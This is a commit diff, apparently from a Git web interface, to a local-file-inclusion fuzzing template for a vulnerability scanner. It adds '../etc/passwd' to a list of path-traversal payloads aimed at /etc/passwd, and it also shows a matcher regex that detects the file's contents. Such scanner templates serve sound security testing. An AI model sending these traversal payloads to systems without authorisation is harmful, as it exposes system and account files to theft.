Update linux-lfi-fuzz.yaml
Adding additional payload under low for one directly traversal ../ Currently 0 and 2 and beyond are usedpatch-14
parent
d7a8cc2096
commit
cb893d1dcd
|
@ -21,6 +21,7 @@ http:
|
|||
nix_fuzz:
|
||||
low:
|
||||
- '/etc/passwd'
|
||||
- '../etc/passwd'
|
||||
- '../../etc/passwd'
|
||||
- '../../../etc/passwd'
|
||||
- '/../../../../etc/passwd'
|
||||
|
@ -82,4 +83,4 @@ http:
|
|||
part: body
|
||||
regex:
|
||||
- 'root:.*:0:0:'
|
||||
# digest: 4a0a0047304502201826f685956c3337da374fe68d92ed5a4785715d95b5de18bdf71e67e3e3dd5a022100b5c835a996c860de0777d15324ce81dc5ee29a2ec11196e218e72e2a9b1196e9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502201826f685956c3337da374fe68d92ed5a4785715d95b5de18bdf71e67e3e3dd5a022100b5c835a996c860de0777d15324ce81dc5ee29a2ec11196e218e72e2a9b1196e9:922c64590222798bb761d5b6d8e72950
|
||||
|
|
Loading…
Reference in New Issue